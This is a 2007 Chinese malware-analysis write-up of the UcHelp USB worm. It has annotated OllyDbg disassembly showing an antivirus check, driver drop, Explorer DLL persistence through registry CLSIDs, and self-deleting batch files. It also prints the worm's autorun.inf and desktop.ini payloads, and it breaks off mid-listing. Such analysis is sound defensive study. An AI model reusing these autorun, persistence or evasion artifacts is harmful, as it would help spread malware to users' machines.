xTiNt【文章标题】: UcHelp 病毒分析 By CaTer
【文章作者】: Cater
【作者邮箱】: 24882688@qq.com
【作者QQ号】: 24882688
【下载地址】: 自己搜索下载
【加壳方式】: FSG 2.0
【编写语言】: C++ 6.0
【使用工具】: OD
【操作平台】: XP-SP2
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
UcHelp 病毒分析
旁白:
都大二了,还是无所为,不知道以后工作怎么办哦~苦恼...
烦人事一大堆,最近学校机房病毒泛滥,主要就是 UcHelp 病毒
///////////////////////////////////////////////////////////
主要就是 移动存储器里面有
===========================
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
-----------------------
X:\autorun.inf
正常情况下不可见
X:\RECYCLER\
不能正常访问
-----------------------
===========================
+++++++++++++++++++++++++++++++++++++++++++++
Explorer 中自动加载
system32\AceExt32.dll
windows\Downloaded Program Files\ZipExt32.dll
+++++++++++++++++++++++++++++++++++++++++++++
当然 ,病毒会感染所有移动存储设备,并加载到系统自动运行,继续传播感染其他及其和移动存储设备。
///////////////////////////////////////////////////////////
程序没有修改注册表隐藏文件?病毒清理不干净~
so 只好硬着头皮来分析分析这个病毒啦~(还不知道往上面有没有关于这个病毒的分析)
废话这么多,就看看我的分析吧~
Cater [*.S.T] QQ:24882688
2007.06.01 扬州/南京 写
=================================================================================================
第一步 从主程序(UcHelp.exe)开始分析
00401800 /$ 55
PUSH EBP
00401801 |. 8BEC
MOV EBP ,
ESP
00401803 |. 83E4 F8
AND ESP ,FFFFFFF8
00401806 |. 81EC 94010000
SUB ESP ,194
0040180C |. 33C0
XOR EAX ,
EAX
0040180E |. 894424 09
MOV DWORD PTR SS :[
ESP +9],
EAX
00401812 |. 53
PUSH EBX
00401813 |. 66:894424 11
MOV WORD PTR SS :[
ESP +11],
AX
00401818 |. 56
PUSH ESI
00401819 |. 57
PUSH EDI
0040181A |. 884424 20
MOV BYTE PTR SS :[
ESP +20],
AL
0040181E |. 884424 1B
MOV BYTE PTR SS :[
ESP +1B],
AL
00401822 |. B9 1F000000
MOV ECX ,1F
00401827 |. 8D7C24 21
LEA EDI ,
DWORD PTR SS :[
ESP +21]
0040182B |. F3:AB
REP STOS DWORD PTR ES :[
EDI ]
0040182D |. 68 80000000
PUSH 80
; /BufSize = 80 (128.)
00401832 |. 8D4C24 24
LEA ECX ,
DWORD PTR SS :[
ESP +24]
; |
00401836 |. 66:AB
STOS WORD PTR ES :[
EDI ]
; |
00401838 |. 51
PUSH ECX ; |PathBuffer
00401839 |. 6A 00
PUSH 0
; |hModule = NULL
0040183B |. C64424 20 00
MOV BYTE PTR SS :[
ESP +20],0
; |
00401840 |. AA
STOS BYTE PTR ES :[
EDI ]
; |
00401841 |. FF15 7C204000
CALL DWORD PTR DS :[<&KERNEL32.GetModuleF>
; \GetModuleFileNameA
00401847 |. E8 E4F8FFFF
CALL UcHelp.00401130
; 检查 进程 是否含有 avp.exe
0040184C |. 84C0
TEST AL ,
AL
0040184E |. 74 2E
JE SHORT UcHelp.0040187E
00401850 |. 8B55 08
MOV EDX ,
DWORD PTR SS :[
EBP +8]
; 有 avp.exe 就 来这里拉
00401853 |. 6A 05
PUSH 5
; /ShowState = SW_SHOW
00401855 |. 6A 00
PUSH 0
; |/lParam = 0
00401857 |. 68 E0174000
PUSH UcHelp.004017E0
; ||pDlgProc = UcHelp.004017E0
0040185C |. 6A 00
PUSH 0
; ||hOwner = NULL
0040185E |. 6A 65
PUSH 65
; ||pTemplate = 65
00401860 |. 52
PUSH EDX ; ||hInst
00401861 |. FF15 E4204000
CALL DWORD PTR DS :[<&USER32.CreateDialog>
; |\CreateDialogParamA
00401867 |. 50
PUSH EAX ; |hWnd
00401868 |. FF15 E8204000
CALL DWORD PTR DS :[<&USER32.ShowWindow>]
; \ShowWindow
0040186E |. E8 2DF9FFFF
CALL UcHelp.004011A0
; 释放资源 ret 到 C:\sysret.dat 并 运行
00401873 |. 68 58020000
PUSH 258
; /Timeout = 600. ms
00401878 |. FF15 8C204000
CALL DWORD PTR DS :[<&KERNEL32.Sleep>]
; \Sleep
0040187E |> \E8 ADFBFFFF
CALL UcHelp.00401430
; 释放资源dll到 system32\AceExt32.dll 并载到explorer进程
00401883 |. 8B35 B4204000
MOV ESI ,
DWORD PTR DS :[<&MSVCRT.strs>
; msvcrt.strstr
00401889 |. 8D4424 20
LEA EAX ,
DWORD PTR SS :[
ESP +20]
0040188D |. 68 C0234000
PUSH UcHelp.004023C0
; /UcHelp.exe
00401892 |. 50
PUSH EAX ; |s1
00401893 |. FFD6
CALL ESI ; \strstr
00401895 |. 83C4 08
ADD ESP ,8
; 检查 当前程序的文件名 中是否含有 UcHelp.exe
00401898 |. 85C0
TEST EAX ,
EAX
0040189A |. 75 4B
JNZ SHORT UcHelp.004018E7
0040189C |. 8D4C24 10
LEA ECX ,
DWORD PTR SS :[
ESP +10]
; 没有 UcHelp.exe 就运行以下
004018A0 |. 51
PUSH ECX ; /pHandle
004018A1 |. 68 3F000F00
PUSH 0F003F
; |Access = KEY_ALL_ACCESS
004018A6 |. 50
PUSH EAX ; |Reserved
004018A7 |. 68 78214000
PUSH UcHelp.00402178
; |SOFTWARE\Microsoft\Windows\CurrentVersion
004018AC |. 68 02000080
PUSH 80000002
; |hKey = HKEY_LOCAL_MACHINE
004018B1 |. FF15 08204000
CALL DWORD PTR DS :[<&ADVAPI32.RegOp>
; \RegOpenKeyExA
004018B7 |. 68 68214000
PUSH UcHelp.00402168
; /yes
004018BC |. FF15 3C204000
CALL DWORD PTR DS :[<&KERNEL32.lstrl>
; \lstrlenA
004018C2 |. 8B5424 10
MOV EDX ,
DWORD PTR SS :[
ESP +10]
004018C6 |. 50
PUSH EAX ; /BufSize
004018C7 |. 68 68214000
PUSH UcHelp.00402168
; |yes
004018CC |. 6A 01
PUSH 1
; |ValueType = REG_SZ
004018CE |. 6A 00
PUSH 0
; |Reserved = 0
004018D0 |. 68 6C214000
PUSH UcHelp.0040216C
; |SM_GameDrop
004018D5 |. 52
PUSH EDX ; |hKey
004018D6 |. FF15 00204000
CALL DWORD PTR DS :[<&ADVAPI32.RegSe>
; \RegSetValueExA
004018DC |. 8B4424 10
MOV EAX ,
DWORD PTR SS :[
ESP +10]
; 写HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDrop=Yes
004018E0 |. 50
PUSH EAX ; /hKey
004018E1 |. FF15 18204000
CALL DWORD PTR DS :[<&ADVAPI32.RegCl>
; \RegCloseKey
004018E7 |> 8D4C24 20
LEA ECX ,
DWORD PTR SS :[
ESP +20]
004018EB |. 68 C0234000
PUSH UcHelp.004023C0
; UcHelp.exe
004018F0 |. 51
PUSH ECX
004018F1 |. FFD6
CALL ESI
004018F3 |. 83C4 08
ADD ESP ,8
004018F6 |. 85C0
TEST EAX ,
EAX
004018F8 |. 0F84 70010000
JE UcHelp.00401A6E
004018FE |. 8B35 EC204000
MOV ESI ,
DWORD PTR DS :[<&USER32.wspr>
; USER32.wsprintfA
00401904 |. 8B3D 70204000
MOV EDI ,
DWORD PTR DS :[<&KERNEL32.Ge>
; kernel32.GetDriveTypeA
0040190A |. B3 43
MOV BL ,43
0040190C |. 8D6424 00
LEA ESP ,
DWORD PTR SS :[
ESP ]
00401910 |> 0FBEC3 /
MOVSX EAX ,
BL
00401913 |. 50 |
PUSH EAX
00401914 |. 33D2 |
XOR EDX ,
EDX
00401916 |. 8D4C24 18 |
LEA ECX ,
DWORD PTR SS :[
ESP +18]
0040191A |. 895424 18 |
MOV DWORD PTR SS :[
ESP +18],
EDX
0040191E |. 68 BC234000 |
PUSH UcHelp.004023BC
; %c:
00401923 |. 51 |
PUSH ECX
00401924 |. 895424 24 |
MOV DWORD PTR SS :[
ESP +24],
EDX
00401928 |. FFD6 |
CALL ESI
0040192A |. 83C4 0C |
ADD ESP ,0C
0040192D |. 8D5424 14 |
LEA EDX ,
DWORD PTR SS :[
ESP +14]
00401931 |. 52 |
PUSH EDX
00401932 |. FFD7 |
CALL EDI
00401934 |. 83F8 02 |
CMP EAX ,2
00401937 |. 74 09 |
JE SHORT UcHelp.00401942
; 找到 移动设备跳出
00401939 |. FEC3 |
INC BL ; 列举驱动器,从 c盘 列举 到 z 盘
0040193B |. 80FB 5A |
CMP BL ,5A
0040193E |.^ 7E D0 \JLE SHORT UcHelp.00401910
00401940 |. EB 7B
JMP SHORT UcHelp.004019BD
00401942 |> 6A 00
PUSH 0
; /Title = NULL
00401944 |. 68 AC234000
PUSH UcHelp.004023AC
; |CabinetWClass
00401949 |. FF15 F4204000
CALL DWORD PTR DS :[<&USER32.FindWin>
; \FindWindowA
0040194F |. 8B35 FC204000
MOV ESI ,
DWORD PTR DS :[<&USER32.Find>
; USER32.FindWindowExA
00401955 |. 6A 00
PUSH 0
; /Title = NULL
00401957 |. 68 A4234000
PUSH UcHelp.004023A4
; |WorkerW
0040195C |. 6A 00
PUSH 0
; |hAfterWnd = NULL
0040195E |. 50
PUSH EAX ; |hParent
0040195F |. FFD6
CALL ESI ; \FindWindowExA
00401961 |. 6A 00
PUSH 0
; /Title = NULL
00401963 |. 68 94234000
PUSH UcHelp.00402394
; |ReBarWindow32
00401968 |. 6A 00
PUSH 0
; |hAfterWnd = NULL
0040196A |. 50
PUSH EAX ; |hParent
0040196B |. FFD6
CALL ESI ; \FindWindowExA
0040196D |. 6A 00
PUSH 0
; /Title = NULL
0040196F |. 68 84234000
PUSH UcHelp.00402384
; |ComboBoxEx32
00401974 |. 6A 00
PUSH 0
; |hAfterWnd = NULL
00401976 |. 50
PUSH EAX ; |hParent
00401977 |. FFD6
CALL ESI ; \FindWindowExA
00401979 |. 6A 00
PUSH 0
; /Title = NULL
0040197B |. 68 78234000
PUSH UcHelp.00402378
; |ComboBox
00401980 |. 6A 00
PUSH 0
; |hAfterWnd = NULL
00401982 |. 50
PUSH EAX ; |hParent
00401983 |. FFD6
CALL ESI ; \FindWindowExA
00401985 |. 6A 00
PUSH 0
; /Title = NULL
00401987 |. 68 70234000
PUSH UcHelp.00402370
; |Edit
0040198C |. 6A 00
PUSH 0
; |hAfterWnd = NULL
0040198E |. 50
PUSH EAX ; |hParent
0040198F |. FFD6
CALL ESI ; \FindWindowExA
00401991 |. 8B3D F0204000
MOV EDI ,
DWORD PTR DS :[<&USER32.Send>
; USER32.SendMessageA
00401997 |. 8BF0
MOV ESI ,
EAX
00401999 |. 8D4424 14
LEA EAX ,
DWORD PTR SS :[
ESP +14]
; 下面 是 激活该移动设备的资源管理器窗口
0040199D |. 50
PUSH EAX ; /lParam
0040199E |. 6A 00
PUSH 0
; |wParam = 0
004019A0 |. 6A 0C
PUSH 0C
; |Message = WM_SETTEXT
004019A2 |. 56
PUSH ESI ; |hWnd
004019A3 |. FFD7
CALL EDI ; \SendMessageA
004019A5 |. 6A 00
PUSH 0
; /lParam = 0
004019A7 |. 6A 0D
PUSH 0D
; |wParam = D
004019A9 |. 68 00010000
PUSH 100
; |Message = WM_KEYDOWN
004019AE |. 56
PUSH ESI ; |hWnd
004019AF |. FFD7
CALL EDI ; \SendMessageA
004019B1 |. 6A 00
PUSH 0
; /lParam = 0
004019B3 |. 6A 0D
PUSH 0D
; |wParam = D
004019B5 |. 68 01010000
PUSH 101
; |Message = WM_KEYUP
004019BA |. 56
PUSH ESI ; |hWnd
004019BB |. FFD7
CALL EDI ; \SendMessageA
004019BD |> C68424 A00000>
MOV BYTE PTR SS :[
ESP +A0],0
; 以上代码大致 就是 准备向 移动设备发飙了
004019C5 |. 33C0
XOR EAX ,
EAX
004019C7 |. B9 3F000000
MOV ECX ,3F
004019CC |. 8DBC24 A10000>
LEA EDI ,
DWORD PTR SS :[
ESP +A1]
004019D3 |. F3:AB
REP STOS DWORD PTR ES :[
EDI ]
004019D5 |. 8D4C24 10
LEA ECX ,
DWORD PTR SS :[
ESP +10]
004019D9 |. 51
PUSH ECX ; /pHandle
004019DA |. 66:AB
STOS WORD PTR ES :[
EDI ]
; |
004019DC |. 68 30234000
PUSH UcHelp.00402330
; |Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
004019E1 |. 68 01000080
PUSH 80000001
; |hKey = HKEY_CURRENT_USER
004019E6 |. AA
STOS BYTE PTR ES :[
EDI ]
; |
004019E7 |. FF15 10204000
CALL DWORD PTR DS :[<&ADVAPI32.RegOp>
; \RegOpenKeyA
004019ED |. 8B1D 14204000
MOV EBX ,
DWORD PTR DS :[<&ADVAPI32.Re>
; ADVAPI32.RegEnumKeyA
004019F3 |. C74424 1C 0A0>
MOV DWORD PTR SS :[
ESP +1C],0A
004019FB |. EB 03
JMP SHORT UcHelp.00401A00
004019FD | 8D49 00
LEA ECX ,
DWORD PTR DS :[
ECX ]
00401A00 |> 8B4424 10 /
MOV EAX ,
DWORD PTR SS :[
ESP +10]
00401A04 |. 68 00010000 |
PUSH 100
00401A09 |. 8D9424 A40000>|
LEA EDX ,
DWORD PTR SS :[
ESP +A4]
00401A10 |. 52 |
PUSH EDX
00401A11 |. 33F6 |
XOR ESI ,
ESI
00401A13 |. 56 |
PUSH ESI
00401A14 |. 50 |
PUSH EAX
00401A15 |. FFD3 |
CALL EBX
00401A17 |. 85C0 |
TEST EAX ,
EAX
00401A19 |. 75 42 |
JNZ SHORT UcHelp.00401A5D
00401A1B |. EB 03 |
JMP SHORT UcHelp.00401A20
00401A1D | 8D49 00 |
LEA ECX ,
DWORD PTR DS :[
ECX ]
00401A20 |> 8B5424 10 |/
MOV EDX ,
DWORD PTR SS :[
ESP +10]
00401A24 |. 8D8C24 A00000>||
LEA ECX ,
DWORD PTR SS :[
ESP +A0]
00401A2B |. 51 ||
PUSH ECX ; /SubKey
00401A2C |. 52 ||
PUSH EDX ; |hKey
00401A2D |. FF15 DC204000 ||
CALL DWORD PTR DS :[<&SHLWAPI.SHDe>
; \SHDeleteKeyA
00401A33 |. 33C0 ||
XOR EAX ,
EAX
00401A35 |. B9 40000000 ||
MOV ECX ,40
00401A3A |. 8DBC24 A00000>||
LEA EDI ,
DWORD PTR SS :[
ESP +A0]
00401A41 |. F3:AB ||
REP STOS DWORD PTR ES :[
EDI ]
00401A43 |. 8B4C24 10 ||
MOV ECX ,
DWORD PTR SS :[
ESP +10]
00401A47 |. 68 00010000 ||
PUSH 100
00401A4C |. 8D8424 A40000>||
LEA EAX ,
DWORD PTR SS :[
ESP +A4]
00401A53 |. 50 ||
PUSH EAX
00401A54 |. 46 ||
INC ESI
00401A55 |. 56 ||
PUSH ESI
00401A56 |. 51 ||
PUSH ECX
00401A57 |. FFD3 ||
CALL EBX
00401A59 |. 85C0 ||
TEST EAX ,
EAX
00401A5B |.^ 74 C3 |\JE SHORT UcHelp.00401A20
00401A5D |> FF4C24 1C |
DEC DWORD PTR SS :[
ESP +1C]
; 在 那个项目里面依次删除无关项目
00401A61 |.^ 75 9D \JNZ SHORT UcHelp.00401A00
00401A63 |. E8 B8F7FFFF
CALL UcHelp.00401220
; 检查 SM_GameDrop 键值是否为 yes,不是就从释放资源 exe 到 ulinshi32.exe 并运行
00401A68 |. 8B35 B4204000
MOV ESI ,
DWORD PTR DS :[<&MSVCRT.strs>
; msvcrt.strstr
00401A6E |> E8 0DFCFFFF
CALL UcHelp.00401680
; 建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150} 将 AceExt32.dll 与之关联以及建立项目情况
00401A73 |. E8 28F9FFFF
CALL UcHelp.004013A0
; 将本程序 拷贝至 C:\windows\Downloaded Program Files\CxUSBKey.exe
00401A78 |. 8D5424 20
LEA EDX ,
DWORD PTR SS :[
ESP +20]
00401A7C |. 68 C0234000
PUSH UcHelp.004023C0
; UcHelp.exe
00401A81 |. 52
PUSH EDX
00401A82 |. FFD6
CALL ESI
00401A84 |. 83C4 08
ADD ESP ,8
00401A87 |. 85C0
TEST EAX ,
EAX
00401A89 |. 75 05
JNZ SHORT UcHelp.00401A90
00401A8B |. E8 70F5FFFF
CALL UcHelp.00401000
;在临时文件夹 创建ziptmp.bat写入,删除本程序的批处理并且运行
00401A90 |> 5F
POP EDI
00401A91 |. 5E
POP ESI
00401A92 |. 33C0
XOR EAX ,
EAX
00401A94 |. 5B
POP EBX
00401A95 |. 8BE5
MOV ESP ,
EBP
00401A97 |. 5D
POP EBP
00401A98 \. C2 1000
RETN 10
=================================================================================================
第二步:分析 那个针对杀毒软件的 sysret.dat
病毒 主程序 UcHelp.exe 释放资源
ret 的 C:\sysret.dat
00401600 55
PUSH EBP
00401601 8BEC
MOV EBP ,
ESP
00401603 83E4 F8
AND ESP ,FFFFFFF8
00401606 81EC 08020000
SUB ESP ,208
0040160C 56
PUSH ESI
0040160D 57
PUSH EDI
0040160E E8 DDFEFFFF
CALL UnPacK_D.004014F0
; 释放资源 SYSRET 到 C:\sysret.sys,并加载到系统核心,并重启电脑
00401613 A1 74114000
MOV EAX ,
DWORD PTR DS :[401174]
00401618 66:8B0D 7811400>
MOV CX ,
WORD PTR DS :[401178]
0040161F 894424 10
MOV DWORD PTR SS :[
ESP +10],
EAX
00401623 66:894C24 14
MOV WORD PTR SS :[
ESP +14],
CX
00401628 33C0
XOR EAX ,
EAX
0040162A B9 3E000000
MOV ECX ,3E
0040162F 8D7C24 16
LEA EDI ,
DWORD PTR SS :[
ESP +16]
00401633 F3:AB
REP STOS DWORD PTR ES :[
EDI ]
00401635 68 00010000
PUSH 100
0040163A 8D9424 14010000
LEA EDX ,
DWORD PTR SS :[
ESP +114]
00401641 52
PUSH EDX
00401642 6A 00
PUSH 0
00401644 66:AB
STOS WORD PTR ES :[
EDI ]
00401646 66:C74424 14 22>
MOV WORD PTR SS :[
ESP +14],22
0040164D FF15 40104000
CALL DWORD PTR DS :[<&KERNEL32.GetModuleF>
; kernel32.GetModuleFileNameA
00401653 8B35 3C104000
MOV ESI ,
DWORD PTR DS :[<&KERNEL32.lstrcat>
; kernel32.lstrcatA
00401659 8D8424 10010000
LEA EAX ,
DWORD PTR SS :[
ESP +110]
00401660 50
PUSH EAX
00401661 8D4C24 14
LEA ECX ,
DWORD PTR SS :[
ESP +14]
00401665 51
PUSH ECX
00401666 FFD6
CALL ESI
00401668 8D5424 08
LEA EDX ,
DWORD PTR SS :[
ESP +8]
0040166C 52
PUSH EDX
0040166D 8D4424 14
LEA EAX ,
DWORD PTR SS :[
ESP +14]
00401671 50
PUSH EAX
00401672 FFD6
CALL ESI
00401674 68 68114000
PUSH UnPacK_D.00401168
; ASCII "
del %0
"
00401679 8D4C24 14
LEA ECX ,
DWORD PTR SS :[
ESP +14]
0040167D 51
PUSH ECX
0040167E FFD6
CALL ESI
00401680 6A 00
PUSH 0
00401682 6A 00
PUSH 0
00401684 6A 02
PUSH 2
00401686 6A 00
PUSH 0
00401688 6A 00
PUSH 0
0040168A 68 00000040
PUSH 40000000
0040168F 68 5C114000
PUSH UnPacK_D.0040115C
; ASCII "tempds.bat"
00401694 FF15 24104000
CALL DWORD PTR DS :[<&KERNEL32.CreateFile>
; kernel32.CreateFileA
0040169A 8BF0
MOV ESI ,
EAX
0040169C 8D4424 10
LEA EAX ,
DWORD PTR SS :[
ESP +10]
004016A0 8D50 01
LEA EDX ,
DWORD PTR DS :[
EAX +1]
004016A3 8A08
MOV CL ,
BYTE PTR DS :[
EAX ]
004016A5 40
INC EAX
004016A6 84C9
TEST CL ,
CL
004016A8 ^ 75 F9
JNZ SHORT UnPacK_D.004016A3
004016AA 2BC2
SUB EAX ,
EDX
004016AC 6A 00
PUSH 0
004016AE 8D5424 10
LEA EDX ,
DWORD PTR SS :[
ESP +10]
004016B2 52
PUSH EDX
004016B3 50
PUSH EAX
004016B4 8D4424 1C
LEA EAX ,
DWORD PTR SS :[
ESP +1C]
004016B8 50
PUSH EAX
004016B9 56
PUSH ESI
004016BA FF15 1C104000
CALL DWORD PTR DS :[<&KERNEL32.WriteFile>>
; kernel32.WriteFile
004016C0 56
PUSH ESI
004016C1 FF15 18104000
CALL DWORD PTR DS :[<&KERNEL32.CloseHandl>
; kernel32.CloseHandle
004016C7 6A 14
PUSH 14
004016C9 FF15 38104000
CALL DWORD PTR DS :[<&KERNEL32.Sleep>]
; kernel32.Sleep
004016CF 6A 00
PUSH 0
004016D1 68 5C114000
PUSH UnPacK_D.0040115C
; ASCII "tempds.bat"
004016D6 FF15 34104000
CALL DWORD PTR DS :[<&KERNEL32.WinExec>]
; kernel32.WinExec
004016DC 5F
POP EDI ; 在 本文件夹下面创建 tempds.bat
004016DD 5E
POP ESI ; 写入 删除本程序的批处理
004016DE 8BE5
MOV ESP ,
EBP ; 运行 tempds.bat 咯
004016E0 5D
POP EBP
004016E1 C2 1000
RETN 10
============================================
批注一下
004015D5 /74 0D
JE SHORT UnPacK_D.004015E4
004015D7 |68 80144000
PUSH UnPacK_D.00401480
004015DC |E8 CFFEFFFF
CALL UnPacK_D.004014B0
;这里就是重启的模块
我想
sysret.sys
里面写着无非是,禁止 avp.exe 运行的相关 R0 代码。
//感谢恶灵骑士 MJ0011 的赐教,原来这里的神秘之处。
=================================================================================================
第三步:分析 病毒核心代码 AceExt32.dll
懒得再去跟dll 了
大致就是,寻找移动存储设备
----------------------------------------------
创建文件夹
X:\RECYCLER\
----------------------------------------------
----------------------------------------------------------
写入文件
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
内容:
X:\autorun.inf
===========================================
[AutoRun]
Shell=打开(&O)
shell\打开(&O)\command=RECYCLER\UcHelp.exe
===========================================
X:\RECYCLER\desktop.ini
===========================================
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
===========================================
--------------------------------------------------------------
做的手脚:
1.
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
这里 把 AceExt32.dll 加载到 Explorer.exe 进行中
好像 ZipExt32.dll 也参与其中了
2.
写入
{35CEC8A3-2BE6-11D2-8773-92E220524150}到 CLSD 关联 AceExt32.dll
3.
这个dll 还具有隐藏,autorun.inf 并限制访问功能
4.
再有的功能就类似 运行 UnHelp.exe 了~
大致 就是 这么个东东了~
=================================================================================================
第四步:分析 ulinshi32.exe 暗部策划向导
00401700 /$ 55
PUSH EBP
00401701 |. 8BEC
MOV EBP ,
ESP
00401703 |. 83E4 F8
AND ESP ,FFFFFFF8
00401706 |. 81EC 04020000
SUB ESP ,204
0040170C |. 53
PUSH EBX
0040170D |. 56
PUSH ESI
0040170E |. 57
PUSH EDI
0040170F |. 33C0
XOR EAX ,
EAX
00401711 |. C64424 10 00
MOV BYTE PTR SS :[
ESP +10],0
00401716 |. 8B35 94204000
MOV ESI ,
DWORD PTR DS :[<&kernel32.GetWin>
; kernel32.GetWindowsDirectoryA
0040171C |. B9 3F000000
MOV ECX ,3F
00401721 |. 8D7C24 11
LEA EDI ,
DWORD PTR SS :[
ESP +11]
00401725 |. F3:AB
REP STOS DWORD PTR ES :[
EDI ]
00401727 |. 66:AB
STOS WORD PTR ES :[
EDI ]
00401729 |. AA
STOS BYTE PTR ES :[
EDI ]
0040172A |. 33C0
XOR EAX ,
EAX
0040172C |. C68424 100100>
MOV BYTE PTR SS :[
ESP +110],0
00401734 |. B9 3F000000
MOV ECX ,3F
00401739 |. 8DBC24 110100>
LEA EDI ,
DWORD PTR SS :[
ESP +111]
00401740 |. F3:AB
REP STOS DWORD PTR ES :[
EDI ]
00401742 |. 66:AB
STOS WORD PTR ES :[
EDI ]
00401744 |. AA
STOS BYTE PTR ES :[
EDI ]
00401745 |. 68 00010000
PUSH 100
; /BufSize = 100 (256.)
0040174A |. 8D4424 14
LEA EAX ,
DWORD PTR SS :[
ESP +14]
; |
0040174E |. 50
PUSH EAX ; |Buffer
0040174F |. FFD6
CALL ESI ; \GetWindowsDirectoryA
00401751 |. 8B3D 34204000
MOV EDI ,
DWORD PTR DS :[<&kernel32.lstrca>
; kernel32.lstrcatA
00401757 |. 68 78214000
PUSH UnPack_D.00402178
; /String2 = "\Downloaded Program Files\ZipExt32.dll"
0040175C |. 8D4C24 14
LEA ECX ,
DWORD PTR SS :[
ESP +14]
; |
00401760 |. 51
PUSH ECX ; |String1
00401761 |. FFD7
CALL EDI ; \lstrcat
00401763 |. 68 00010000
PUSH 100
; /BufSize = 100 (256.)
00401768 |. 8D9424 140100>
LEA EDX ,
DWORD PTR SS :[
ESP +114]
; |
0040176F |. 52
PUSH EDX ; |Buffer
00401770 |. FFD6
CALL ESI ; \GetWindowsDirectoryA
00401772 |. 68 10234000
PUSH UnPack_D.00402310
; /String2 = "\Downloaded Program Files\Ext32.dat"
00401777 |. 8D8424 140100>
LEA EAX ,
DWORD PTR SS :[
ESP +114]
; |
0040177E |. 50
PUSH EAX ; |String1
0040177F |. FFD7
CALL EDI ; \lstrcat
00401781 |. 8D8C24 100100>
LEA ECX ,
DWORD PTR SS :[
ESP +110]
00401788 |. 51
PUSH ECX ; /FileName
00401789 |. FF15 68204000
CALL DWORD PTR DS :[<&kernel32.DeleteFil>
; \DeleteFileA
0040178F |. 8D9424 100100>
LEA EDX ,
DWORD PTR SS :[
ESP +110]
; 删除 C:\windows\Downloaded Program Files\Ext32.dat
00401796 |. 52
PUSH EDX ; /NewName
00401797 |. 8D4424 14
LEA EAX ,
DWORD PTR SS :[
ESP +14]
; |C:\windows\Downloaded Program Files\ZipExt32.dll 改名 C:\windows\Downloaded Program Files\Ext32.dll
0040179B |. 50
PUSH EAX ; |ExistingName
0040179C |. FF15 70204000
CALL DWORD PTR DS :[<&kernel32.MoveFileA>
; \MoveFileA
004017A2 |. E8 89FCFFFF
CALL UnPack_D.00401430
; 先。删除以前生成的相关dll,再释放资源 ceo 到C:\windows\Downloaded Program Files\ZipExt32.dll
004017A7 |. E8 84FEFFFF
CALL UnPack_D.00401630
; 释放资源 hiv 到 c:\tmp.hiv,执行完他的任务,去死
004017AC |. 8B1D 18204000
MOV EBX ,
DWORD PTR DS :[<&advapi32.RegCre>
; advapi32.RegCreateKeyA
004017B2 |. 8D4C24 0C
LEA ECX ,
DWORD PTR SS :[
ESP +C]
004017B6 |. 51
PUSH ECX ; /pHandle
004017B7 |. 68 E0224000
PUSH UnPack_D.004022E0
; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}"
004017BC |. 68 00000080
PUSH 80000000
; |hKey = HKEY_CLASSES_ROOT
004017C1 |. FFD3
CALL EBX ; \RegCreateKeyA
004017C3 |. 8B35 6C204000
MOV ESI ,
DWORD PTR DS :[<&kernel32.lstrle>
; 建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
004017C9 |. 68 D4224000
PUSH UnPack_D.004022D4
; /String = "ZipExt32"
004017CE |. FFD6
CALL ESI ; \lstrlenA
004017D0 |. 8B5424 0C
MOV EDX ,
DWORD PTR SS :[
ESP +C]
004017D4 |. 8B3D 14204000
MOV EDI ,
DWORD PTR DS :[<&advapi32.RegSet>
; advapi32.RegSetValueExA
004017DA |. 50
PUSH EAX ; /BufSize
004017DB |. 68 D4224000
PUSH UnPack_D.004022D4
; |Buffer = UnPack_D.004022D4
004017E0 |. 6A 01
PUSH 1
; |ValueType = REG_SZ
004017E2 |. 6A 00
PUSH 0
; |Reserved = 0
004017E4 |. 68 D0224000
PUSH UnPack_D.004022D0
; |ValueName = ""
004017E9 |. 52
PUSH EDX ; |hKey
004017EA |. FFD7
CALL EDI ; \RegSetValueExA
004017EC |. 8B4424 0C
MOV EAX ,
DWORD PTR SS :[
ESP +C]
004017F0 |. 50
PUSH EAX ; /hKey
004017F1 |. FF15 10204000
CALL DWORD PTR DS :[<&advapi32.RegCloseK>
; \RegCloseKey
004017F7 |. 8D4C24 0C
LEA ECX ,
DWORD PTR SS :[
ESP +C]
004017FB |. 51
PUSH ECX ; /pHandle
004017FC |. 68 94224000
PUSH UnPack_D.00402294
; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}\InprocServer32"
00401801 |. 68 00000080
PUSH 80000000
; |hKey = HKEY_CLASSES_ROOT
00401806 |. FFD3
CALL EBX ; \RegCreateKeyA
00401808 |. 8D5424 10
LEA EDX ,
DWORD PTR SS :[
ESP +10]
; 以下是 建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}等与之关联项目
0040180C |. 52
PUSH EDX ; /String
0040180D |. FFD6
CALL ESI ; \lstrlenA
0040180F |. 8B4C24 0C
MOV ECX ,
DWORD PTR SS :[
ESP +C]
00401813 |. 50
PUSH EAX ; /BufSize
00401814 |. 8D4424 14
LEA EAX ,
DWORD PTR SS :[
ESP +14]
; |
00401818 |. 50
PUSH EAX ; |Buffer
00401819 |. 6A 01
PUSH 1
; |ValueType = REG_SZ
0040181B |. 6A 00
PUSH 0
; |Reserved = 0
0040181D |. 68 D0224000
PUSH UnPack_D.004022D0
; |ValueName = ""
00401822 |. 51
PUSH ECX ; |hKey
00401823 |. FFD7
CALL EDI ; \RegSetValueExA
00401825 |. 68 8C224000
PUSH UnPack_D.0040228C
; /String = "Both"
0040182A |. FFD6
CALL ESI ; \lstrlenA
0040182C |. 8B5424 0C
MOV EDX ,
DWORD PTR SS :[
ESP +C]
00401830 |. 50
PUSH EAX ; /BufSize
00401831 |. 68 8C224000
PUSH UnPack_D.0040228C
; |Buffer = UnPack_D.0040228C
00401836 |. 6A 01
PUSH 1
; |ValueType = REG_SZ
00401838 |. 6A 00
PUSH 0
; |Reserved = 0
0040183A |. 68 7C224000
PUSH UnPack_D.0040227C
; |ValueName = "ThreadingModel"
0040183F |. 52
PUSH EDX ; |hKey
00401840 |. FFD7
CALL EDI ; \RegSetValueExA
00401842 |. 8B4424 0C
MOV EAX ,
